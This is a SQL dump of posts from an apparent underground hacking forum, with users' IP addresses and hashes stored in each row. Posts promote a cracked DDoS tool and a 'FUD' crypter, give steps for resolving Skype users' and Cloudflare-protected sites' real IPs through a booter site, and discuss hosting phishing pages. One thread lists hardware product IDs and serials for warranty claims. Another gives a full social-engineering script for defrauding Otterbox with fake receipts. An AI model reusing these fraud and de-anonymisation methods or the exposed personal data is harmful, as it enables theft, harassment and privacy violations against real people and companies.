'[quote=\'R?????zo?\' pid=\'5988\' dateline=\'1350861450\']\r\nThe download link is on the thread.\r\n[/quote]\r\n\r\nyeah i know but is said post to unlock.Now i got it thanks mate :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4ec9763cc5aafdfe4c35422e0e5982ea', '0', '0'); INSERT INTO mybb_posts VALUES('5991', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1350861620', 'You\'re doing a good job Reloadzor running Unique! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc543b2d37241dca5419dea9784908af', '0', '0'); INSERT INTO mybb_posts VALUES('5993', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '62', 'R?????zo?', '1350861669', 'Yeah he\'s great, thats a good DDoS\'er I think :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '08bbdad7048513c729b2acce48058ef8', '0', '0'); INSERT INTO mybb_posts VALUES('5994', '1041', '0', '81', 'How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '100', '??zg???g????61', '1350861694', 'Alright so, this is really simple, I learned it when I was still a young skid. In this tutorial we will exploit a crappy HF Booter. Here are the 4 simple steps-\r\n\r\n1.) Go to www.absoboot.com\r\n\r\n2.) Register an account and login.\r\n\r\n3.) Navigate to the \"Boot\" tab on the top of the page.\r\n\r\n4.) In the box that says \"IP Lookup\" type in skype:username replacing the username with the desired skype name. If you want to resolve a cloudflare protected IP just type in the website URL.\r\n\r\n\r\n\r\nThats it everyone, thanks for being active members and apart of DDoS\'ers ;)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ac2a5f67e5e93e269051b23fd8e0d72b', '0', '0'); INSERT INTO mybb_posts VALUES('5995', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '100', '??zg???g????61', '1350861734', 'Does it use shells? Thats what I assume at least.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c0386337c92dbd49517bfaf4930aab95', '0', '0'); INSERT INTO mybb_posts VALUES('5996', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '82', 'iTzIpod', '1350861755', 'Posting to see content... :)\n\nEDIT: Nice share :)\nIt actually works.\nAwesome method. :)', '24.212.197.164', '416597412', '1', '0', '82', '1350861805', '1', '22de5c106fb1ada2241e7ee1ef0516de', '0', '1350861805'); INSERT INTO mybb_posts VALUES('5997', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '257', 'XxTREYZxX', '1350861857', 'thanks heaps for the great share mate appreciated, keep the good work up :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '339664d72b0f859933bfc7106926c04a', '0', '0'); INSERT INTO mybb_posts VALUES('5998', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '82', 'iTzIpod', '1350862037', 'I\'ve seen this method multiple times. I don\'t think it\'ll help a person like me though. :p\nBut oh well.\nDifferent people = Different opinions.\n:)\n\nI would\'ve leaked it onto LH but then I thought it was LQ and wouldn\'t help anyone.\nAgain, that\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76a9f15e804188f77c4d430e00152322', '0', '0'); INSERT INTO mybb_posts VALUES('5999', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '222', 'Exposé', '1350862088', 'What\'s up with the sig\'s? All I see is text. And thanks for the update joker :)', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '8f6347be0ae70d040763c867b19b7b9e', '0', '0'); INSERT INTO mybb_posts VALUES('6000', '1042', '0', '3', '[Bug] MyCodes in Signature', '0', '82', 'iTzIpod', '1350862152', '[img]http://i.imgur.com/pHiMD.png[/img]\r\n\r\nIt\'s a bug.\r\n:o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '201e9071173ccb4e0195d51bf7569988', '0', '0'); INSERT INTO mybb_posts VALUES('6001', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350862195', '/me Is eating twizzlers atm and they are fuckin amazing', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '146661902a5b859321bd271920493f9c', '0', '0'); INSERT INTO mybb_posts VALUES('6002', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862242', '/me is currently typing this post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c2180c714ddbee4bc587b4391220039', '0', '0'); INSERT INTO mybb_posts VALUES('6003', '1042', '6000', '3', 'RE: [Bug] MyCodes in Signature', '0', '1', 't3h jok3r', '1350862243', 'Fixed. Thanks for the report.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8f3ad2e44eae0563f1be094322869dd7', '0', '0'); INSERT INTO mybb_posts VALUES('6004', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1350862258', '/me is posting right at the moment LOL', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0c051b01b91727879c00325d51693e7e', '0', '0'); INSERT INTO mybb_posts VALUES('6005', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862331', '/me is posting again. :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2142a7de94890d13c06546bdc80be5ac', '0', '0'); INSERT INTO mybb_posts VALUES('6006', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '257', 'XxTREYZxX', '1350862347', 'thanks man, keep up the good work, your doing great mate :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'be60725b91ba5d4a3d875c868f6c6662', '0', '0'); INSERT INTO mybb_posts VALUES('6007', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350862356', '/me doesn\'t like all this obviousness', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '06816284c573217ab57b15a9ef0b0808', '0', '0'); INSERT INTO mybb_posts VALUES('6008', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1350862414', '/me laughing at all the stupid post right now', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'debe3f2ed33fbbb96e40f5799d62cfd8', '0', '0'); INSERT INTO mybb_posts VALUES('6009', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '222', 'Exposé', '1350862415', 'Nice plugin but u should make it green and not red', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', 'dbb983568bb55d52d57ad85b8e362e3e', '0', '0'); INSERT INTO mybb_posts VALUES('6010', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862415', '/me is talking to t3h jok3r on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '19ae5c57c1376e57da8879c872aeba07', '0', '0'); INSERT INTO mybb_posts VALUES('6011', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '257', 'XxTREYZxX', '1350862497', 'im posting so i can see the god damm link ahah', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'c551aaa759885ada021407fe4a984a2c', '0', '0'); INSERT INTO mybb_posts VALUES('6012', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350862503', '[quote=\'ƒ???????????g\' pid=\'6009\' dateline=\'1350862415\']\nNice plugin but u should make it green and not red\n[/quote]\n\nWhy make it green?\n\nMaking it red will attract more attention since our forum colors are green and black.\nAlso, red is known for like \"STOP\" or whatever :p', '24.212.197.164', '416597412', '1', '0', '82', '1350862556', '1', '3f5b69a190bb0f5f2120d5c5b26b449d', '0', '1350862556'); INSERT INTO mybb_posts VALUES('6013', '1031', '6012', '7', 'RE: Testing new plugin public', '0', '257', 'XxTREYZxX', '1350862571', '[quote=\'iTzIpod\' pid=\'6012\' dateline=\'1350862503\']\r\nWhy make it green?\r\n\r\nMaking it red will attract more attention since our forum colors are green and black.\r\nAlso, red is known for like \"STOP\" or whatever :p\r\n[/quote]\r\nTrue story bud iTzIpod is wxactly right :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '22a1ce456e8b8056a8f42dc67f2ba865', '0', '0'); INSERT INTO mybb_posts VALUES('6014', '1031', '6013', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350862722', '[quote=\'xEP1C_SC0P3Sx\' pid=\'6013\' dateline=\'1350862571\']\r\n[quote=\'iTzIpod\' pid=\'6012\' dateline=\'1350862503\']\r\nWhy make it green?\r\n\r\nMaking it red will attract more attention since our forum colors are green and black.\r\nAlso, red is known for like \"STOP\" or whatever :p\r\n[/quote]\r\nTrue story bud iTzIpod is wxactly right :)\r\n[/quote]\r\n\r\nI try to put my logic into my posts ;) xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c962c9a20b18018a58fb96987368829', '0', '0'); INSERT INTO mybb_posts VALUES('6015', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '228', 'VirtualLegend', '1350862903', 'thanks for the share bro!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2aa267ba4d8a5fb3597be4355dabbb10', '0', '0'); INSERT INTO mybb_posts VALUES('6016', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '100', '??zg???g????61', '1350863011', ':) no problem', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '37901ef2a33ae010e4203acfb1538d30', '0', '0'); INSERT INTO mybb_posts VALUES('6017', '1032', '5999', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350863252', '[quote=\'ƒ???????????g\' pid=\'5999\' dateline=\'1350862088\']\r\nWhat\'s up with the sig\'s? All I see is text. And thanks for the update joker :)\r\n[/quote]\r\n\r\nI messed up a setting but it\'s fixed now.\r\n\r\n[quote=\'xEP1C_SC0P3Sx\' pid=\'5989\' dateline=\'1350861455\']\r\nwe are growing more and more every day but not sure about the:you must post to unlock this link.Its kinda confusing. Go LH\r\n[/quote]\r\n\r\n\r\nIt\'s to prevent leeching and help increase our forums posts. From this it will prevent people from saying \"it helps keep my thread up\" etc and this will give us another reason to be different from HF.\r\n\r\n[quote=\'R?????zo?\' pid=\'5974\' dateline=\'1350860735\']\r\nI think the \"You must post to unlock this link\" is a good idea, but it also blocks links on people signatures.\r\n[/quote]\r\n\r\nTrue, because it basically reads all the links in the thread. They are viewable though after you post.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '65a58c4aa4a925ef67f12a60fa745816', '0', '0'); INSERT INTO mybb_posts VALUES('6018', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '228', 'VirtualLegend', '1350866741', 'Nice I\'m glad to be a part of this group', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd7b8be269b88383fb5a8b5431a682ef4', '0', '0'); INSERT INTO mybb_posts VALUES('6019', '1043', '0', '58', '[NEW] Group Recruiting - DDoS\'ers', '1', '100', '??zg???g????61', '1350868687', 'Hey everyone, so my new group - DDoS\'ers is now RECRUITING! \r\n\r\nThis is an open group- Anyone can join, IF I choose to let you in.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '-2', 'aea825442fad7534430a63f0337e9099', '0', '0'); INSERT INTO mybb_posts VALUES('6020', '2', '4', '34', 'RE: Userbar tut', '0', '222', 'Exposé', '1350870638', 'Thanks for the tut but already knew this :P', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '032d2f3c08d3da5d5d61cee137719da6', '0', '0'); INSERT INTO mybb_posts VALUES('6021', '1031', '6009', '7', 'RE: Testing new plugin public', '0', '205', 'mothered', '1350871632', '[quote=\'ƒ???????????g\' pid=\'6009\' dateline=\'1350862415\']\r\nNice plugin but u should make it green and not red\r\n[/quote]\r\n\r\nI like the look of this.\r\n\r\nI do agree, that the red Is a little too strong, but green will clash with the theme, so perhaps trial and error with other colors?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6e8ddaf0c9ea7a48e09bcc3c5e27681f', '0', '0'); INSERT INTO mybb_posts VALUES('6022', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '205', 'mothered', '1350871975', 'I like all changes mentioned.\r\n\r\nWith the Movie RIPs section, rather than PM\'ing a staff member after 40 posts, can you set the permissions In the ACP? Meaning, access Is denied with less than 40 posts.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a935fcea8bc348ae7f3fb1073428f7af', '0', '0'); INSERT INTO mybb_posts VALUES('6023', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '222', 'Exposé', '1350872138', 'Nah WPa2 is mad easy....dude just use Backtrack...and look up some tuts on how to use it...mad easy', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '06bb490447d9d3884ebb839e3be14cce', '0', '0'); INSERT INTO mybb_posts VALUES('6024', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '222', 'Exposé', '1350872190', 'Nice tut....but already know how to make generators..takes me like 2 seconds', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '2050931843bfba7ac447387404190431', '0', '0'); INSERT INTO mybb_posts VALUES('6025', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '205', 'mothered', '1350872442', 'WPA, WPA2, WPA/PSK, you can crack all of them.\r\n\r\nI\'ve done It many times.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f67bb0acffb1bfbda7446c9b2ddc8166', '0', '0'); INSERT INTO mybb_posts VALUES('6026', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '205', 'mothered', '1350872648', 'I\'ve done this In BackTrack 5 R2 a while back.\r\n\r\nIt\'s certainly worth It.\r\nThanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '47b95cdaccd554f4d28c8f88fefdb7fa', '0', '0'); INSERT INTO mybb_posts VALUES('6027', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '205', 'mothered', '1350872862', 'I know desktops are considered better for gaming, but you can match that with a lappy.\r\n\r\nFor example, the Dell Alienware, with twin GTX 680 cards (SLI configured), will chew any game on maximum res.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e8d0a9c2be465ef76d1e1aec267a9ce7', '0', '0'); INSERT INTO mybb_posts VALUES('6028', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350873082', 'yes thats a great laptop and prob the best :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8c31a1b9a4e97fa51334382cc03d1ef3', '0', '0'); INSERT INTO mybb_posts VALUES('6029', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '205', 'mothered', '1350873176', 'That\'s absolutely huge, I wouldn\'t know where to begin!\r\n\r\nMuch appreciated mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b730a5873e325aacf6ae2d941ea07023', '0', '0'); INSERT INTO mybb_posts VALUES('6030', '1017', '6025', '11', 'RE: Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350873271', '[quote=\'mothered\' pid=\'6025\' dateline=\'1350872442\']\r\nWPA, WPA2, WPA/PSK, you can crack all of them.\r\n\r\nI\'ve done It many times.\r\n[/quote]\r\n\r\nthanks that hepled alot i will be closing the thread to prevent spam', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0cadecda8835a6d35d4a26fb071b42d3', '0', '0'); INSERT INTO mybb_posts VALUES('6031', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '257', 'XxTREYZxX', '1350873355', 'thanks for the great share mate keep the great work up a;O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'af3c5c9c98bd7f01ec03f2afd2bb1133', '0', '0'); INSERT INTO mybb_posts VALUES('6032', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '257', 'XxTREYZxX', '1350873411', 'can you please tell us how thanks alot man', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b75b999092fa32ba9e4d37fd82873bb0', '0', '0'); INSERT INTO mybb_posts VALUES('6033', '2', '4', '34', 'RE: Userbar tut', '0', '205', 'mothered', '1350873676', 'I\'ve always wondered how to make userbars.\r\n\r\nI\'m not very good with graphics, hence this\'ll certainly be of great help.\r\nMany thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '501afc08ebf5fa0064c9f9b234a74f60', '0', '0'); INSERT INTO mybb_posts VALUES('6034', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '222', 'Exposé', '1350873721', 'I use 000webhost lmao...which is pretty good', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f213a58d6a418ff8863bcca6a0bc77a4', '0', '0'); INSERT INTO mybb_posts VALUES('6035', '1032', '6022', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350873877', '[quote=\'mothered\' pid=\'6022\' dateline=\'1350871975\']\r\nI like all changes mentioned.\r\n\r\nWith the Movie RIPs section, rather than PM\'ing a staff member after 40 posts, can you set the permissions In the ACP? Meaning, access Is denied with less than 40 posts.\r\n[/quote]\r\n\r\nNice idea but then people will then spam the site with 40 posts, it will be the same with access is denied but we would know what\'s going on and it\'s a temporary thing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3451109dc2e55fec17e3887259f52e6b', '0', '0'); INSERT INTO mybb_posts VALUES('6036', '1044', '0', '2', 'dkdadwa', '0', '61', 'NXK', '1350874777', '[color=#FF4500]eweew[/color][color=#708090][/color]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a22f0a69eb62be61059109cc07e00d81', '0', '0'); INSERT INTO mybb_posts VALUES('6037', '1045', '0', '49', 'Group Format?', '0', '222', 'Exposé', '1350874906', 'I think we should have a group format plugin where it makes the username colored based on what group you are in...this is nice because you can differentiate between who is who...\r\n\r\nWhat do you guys think?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f8796093c3215b8581bf0225c5a3b85e', '0', '0'); INSERT INTO mybb_posts VALUES('6038', '1045', '6037', '49', 'RE: Group Format?', '0', '3', '??????????¢™', '1350875079', 'That can be set in the ACP for the Admins but yes I think this would be great.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '29128a181f23ca3fa31dcefcf057497e', '0', '0'); INSERT INTO mybb_posts VALUES('6039', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350875114', 'Oh I thought this was a custom plugin...but ok even better :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '241d4d7998e0d96062ee5d381615a833', '0', '0'); INSERT INTO mybb_posts VALUES('6040', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '222', 'Exposé', '1350875164', 'Nice leak from SE.net lmao....already had these like a year ago :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '18b0b97cd6b51f7a82481b89b1f0f763', '0', '0'); INSERT INTO mybb_posts VALUES('6041', '1045', '6037', '49', 'RE: Group Format?', '0', '257', 'XxTREYZxX', '1350875167', 'yeah i agree that would be cool aye :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'f8185aea3b23f9048006e5d6b2e352cf', '0', '0'); INSERT INTO mybb_posts VALUES('6042', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '222', 'Exposé', '1350875325', 'I have a laptop HP Sleekbook and I use that for everything :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '4aac242852e35f828638680bab662496', '0', '0'); INSERT INTO mybb_posts VALUES('6043', '2', '4', '34', 'RE: Userbar tut', '0', '222', 'Exposé', '1350875414', 'Lol you could also find these on hf...this is where this is from lol', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'd7a3f4b742016c004bcefb0a3a03592c', '0', '0'); INSERT INTO mybb_posts VALUES('6044', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1350875829', 'You got saved by Ipods post :)\n\nGroup Approved. Group will be added soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '12fca11e8e0353d8d8ed81c77d0f4d67', '0', '0'); INSERT INTO mybb_posts VALUES('6045', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1350875918', 'When is this done? I really want to know if I made it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '0e842c6bcfec8a4d9b487aa11e3fc5b6', '0', '0'); INSERT INTO mybb_posts VALUES('6046', '1046', '0', '43', 'Free PID\'s :D', '0', '222', 'Exposé', '1350875931', 'Microsoft Arc Keyboard\r\n\r\nP/N: J5D-00001\r\n\r\nS/N: 0204400224952 EC\r\n\r\n0204400251135 EC\r\n\r\n0204400320975 EC\r\n\r\n0204400224950 EC\r\n\r\n0204400310636 EC\r\n\r\n\r\nMicrosoft Sidewinder X6 Keyboard\r\n\r\nPID: 00905-137-3443232-61938\r\n\r\n571545228751301000\r\n\r\n\r\nMicrosoft Comfort Curve Keyboard 2000\r\n\r\nPID: 76914-185-5603133-14335\r\n\r\n\r\nRazer Arctosa Gaming Keyboard\r\n\r\nProduct Code/Model #: RZ03-00260100\r\n\r\nSerial: MT1003026H01379\r\n\r\n\r\nSaitek Eclipse II Backlit Keyboard\r\n\r\nProduct Code/Model #: PK02AU\r\n\r\nSerial: 7G15306611B\r\n\r\nMicrosoft Arc Mouse\r\n\r\nP/N: RVF-00001\r\n\r\nPID: 00514-545-3653004-21049\r\n\r\nPN: X817620-002\r\n\r\nS/N: PM1047035101191\r\n\r\n\r\nRazer Mamba Gaming Mouse\r\n\r\nP/N: RZ01-00120100-R3U1\r\n\r\nS/N: Gaming Mouse : PM1041012100913\r\n\r\nCharging Dock : PM1041D12100913\r\n\r\n\r\nMadcatz Infinity Ward Wired Sniper Mouse\r\n\r\nM/N: 44300\r\n\r\nS/N: FO73400415\r\n\r\n\r\nLogitech Corded M500 Mouse\r\n\r\nM/N: M-U0007\r\n\r\nP/N: 810-001176\r\n\r\nPID: LZ041A3\r\n\r\n\r\nLogitech Corded LS1 Mouse\r\n\r\nM/N: M-UAS144\r\n\r\nP/N: 810-000622\r\n\r\nPID: LZ938AJ\r\n\r\n\r\n\r\nLogitech Wireless M215 Mouse\r\n\r\nM/N: M-R0013\r\n\r\nP/N: 810-001550\r\n\r\nPID: LZ006AW\r\n\r\n\r\nRazer Imperator Gaming Mouse\r\n\r\nProduct Number : Rz01-00350100-R3u1\r\n\r\nSerial Number : PM1047035101191\r\n\r\n\r\nLogitech MX Revolution Wireless Mouse\r\n\r\nM/N: M-RBQ124\r\n\r\nP/N: 831869-0000\r\n\r\nPID: LZ638A9\r\n\r\n\r\nExplorer Mini Mouse\r\n\r\nPID: 00516-545-0476765-00145\r\n\r\n\r\nSidewinder x8\r\n\r\nPID: 00903-163-4444946-74171\r\n\r\n\r\nArc Touch Mouse\r\n\r\nPIDs:\r\n\r\n00514-545-0770350-03565\r\n\r\n00514-545-1695089-03496\r\n\r\n00514-545-1239104-03840\r\n\r\n00514-545-1573981-03808\r\n\r\n00514-545-0681890-03793\r\n\r\n00514-545-1572489-03928\r\n\r\n00514-545-1351204-03497\r\n\r\n00514-545-1926830-03920\r\n\r\n00514-545-0471539-03507\r\n\r\n00514-545-0326292-03144\r\n\r\n03020-523-0609733-01045\r\n\r\n\r\n\r\nWorld of Warcraft SteelSeries Cataclysm MMO Gaming Mouse\r\n\r\nProduct Code/Model #: 62100\r\n\r\nSerial: 6210000111291027574\r\n\r\n\r\nMicrosoft LifeCam Cinema HD\r\n\r\nP/N: H5D-00001\r\n\r\nPID: 02045-545-1754434-00941\r\n\r\nPN: X821404-001\r\n\r\n\r\nMicrosoft LifeCam VX-3000\r\n\r\nPID: 78038-171-8422822-97199\r\n\r\n\r\n\r\nMicrosoft LifeCam VX-6000\r\n\r\nPID: 78040-781-6325174-25233\r\n\r\n\r\n\r\nMicrosoft LifeChat LX-3000\r\n\r\nPID: 79108-237-3434025-55476\r\n\r\n\r\nPlaystation Eye\r\n\r\nS/N: 990004612\r\n\r\n\r\nLogitech USB QuickCam Communicate Webcam\r\n\r\nPID: LZ510A54667\r\n\r\nM/N: V-UAM14A\r\n\r\nP/N: 861194-0000\r\n\r\n\r\nMicrosoft Presenter 3000\r\n\r\nPID: 78041-517-4315323-61888\r\n\r\n\r\n\r\nToshiba 160GB HDD\r\n\r\nHP Spare Code: 442171-001\r\n\r\nP/N: 440640-001\r\n\r\n\r\nXbox 360 Controller\r\n\r\nPID: 05880-545-1514247-01506\r\n\r\n\r\nPS3 Dualshock 3 Controller (Not sure if this works!)\r\n\r\nM/N: CECHZC2U\r\n\r\nS/N: 0K40090101270\r\n\r\n\r\nLogitech Wireless S510 Desktop Set\r\n\r\nP/N: 920-000885\r\n\r\nM/N: Y-RAK73\r\n\r\nPID: LZ7386mc\r\n\r\nType: Keyboard/Mouse\r\n\r\n\r\nKensington Ci70 Keyboard Mouse COMBO\r\n\r\nProduct Number : K64392US\r\n\r\nSerial Numbers :\r\n\r\nA0730A000071\r\n\r\nA0915A000100\r\n\r\n\r\nMicrosoft Wireless Laser Desktop 7000\r\n\r\nPID: 92463-556-5333966-23786\r\n\r\n\r\n\r\nMicrosoft Wireless Entertainment Desktop 7000\r\n\r\nPID: 81616-313-1446283-25255\r\n\r\n\r\n\r\nMicrosoft Wireless Entertainment Destop 8000\r\n\r\nPID: 81615-825-6340215-11984\r\n\r\n\r\nMicrosoft Wireless Laser Desktop 6000 v2.0\r\n\r\nPID: 77967-638-2335413-14267\r\n\r\n\r\nSPEAKERS:\r\n\r\nLogitech LS11 Speakers\r\n\r\nPID: CP047\r\n\r\n\r\nLogitech Speaker System Z323\r\n\r\nPID: SN012\r\n\r\n\r\nLogitech Rechargeable Speaker S715i\r\n\r\nPID: GG046\r\n\r\n\r\nLogitech Z323\r\n\r\nP/n: 980-000354\r\n\r\nM/n: s-00075a\r\n\r\nPID: sn043\r\n\r\n\r\nLogitech LS21\r\n\r\nPID- SN012\r\n\r\nM/n- S-00040\r\n\r\nP/n- 880-000117.', '74.76.76.132', '1246514308', '0', '0', '61', '1350876114', '1', '6633edec1eea3cca9d88a889c9c75f4c', '0', '1350876114'); INSERT INTO mybb_posts VALUES('6047', '1046', '6046', '43', 'RE: Free PSD\'s :D', '0', '2', 'Apathy', '1350875973', 'A PSD is a Photoshop file. Did you mean PID? XD', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'cea8b845ecf4a95a8d4a4cd16300d7f4', '0', '0'); INSERT INTO mybb_posts VALUES('6048', '1046', '6046', '43', 'RE: Free PSD\'s :D', '0', '222', 'Exposé', '1350876063', 'LMAO...im thinking photoshop right now lmao....YOLO', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '0fc9757704b7b89471671c1157783910', '0', '0'); INSERT INTO mybb_posts VALUES('6052', '1045', '6037', '49', 'RE: Group Format?', '0', '61', 'NXK', '1350876505', 'Ill take a look into this and contact jok3r. We should be able to do this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '27b47dc44cae3851ce15d5293285b841', '0', '0'); INSERT INTO mybb_posts VALUES('6049', '1047', '0', '16', 'Get free Otterbox cases!', '0', '222', 'Exposé', '1350876167', 'You must email Otterbox ( customer.service@otterbox.com ) and tell them you love their cases and you\'ve been a loyal costumer for quite a while but that you\'re disappointed at a recent product you acquired.\n\nHere\'s an example of what I wrote:\n\nDear Otterbox,\n\nI am a huge fan of your products,I\'ve bought some of your cases for my Kindle,iPad and my previous BlackBerry phones.I\'ve always considered your cases the best in the market and the most reliable too,however,I was recently given one of your BlackBerry Reflex series for the Curve 9300 and while it looked like a really promising case at first,it resulted in a very disappointed experience.\n\nThe problem is that the phone fell from 2 meters and now the case won\'t attach to the phone,I thought your cases would be built in a better quality since they are designed to resist this kind of impact as I\'ve heard,I was so disappointed that I threw the case to the garbage and then I decided to contact you guys to see if you could sort out this for me.\n\nRegards,\n\nMr. Sir\n\n\nA) You must say which case type and for which device\n\nB)This way you eliminate the possibility of them asking for a proof of purchase\n\nC)Since you threw the case to the garbage,they won\'t ask you to send any pictures of it\n\n\nPro tip:If you can\'t bypass the picture,try and get an Amazon receipt (use a receipt generator) and give them that.\n\n\nI hope you enjoyed it,happy SE\'ing!~', '74.76.76.132', '1246514308', '0', '0', '222', '1350876183', '1', 'f0f431aed94da6abc3a221479b1bbc7e', '0', '1350876183'); INSERT INTO mybb_posts VALUES('6050', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1350876414', 'Nice group VirtualLegend....hopefully you will get some good members', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6219de12deb3e249ac427d36de85db3d', '0', '0'); INSERT INTO mybb_posts VALUES('6051', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '1', 't3h jok3r', '1350876450', 'Then suggest other colors and I will see which one suits. I agree red looks like a warning and too strong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6414daf97455989d868221032c12e1e7', '0', '0'); INSERT INTO mybb_posts VALUES('6053', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '2', 'Apathy', '1350877006', 'Have you made it yet? :P', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a26b41f8957a280b10a0e682c13723ae', '0', '0'); INSERT INTO mybb_posts VALUES('6054', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350877595', 'Ok sweet thanks...I think this would be a great addition or upgrade', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 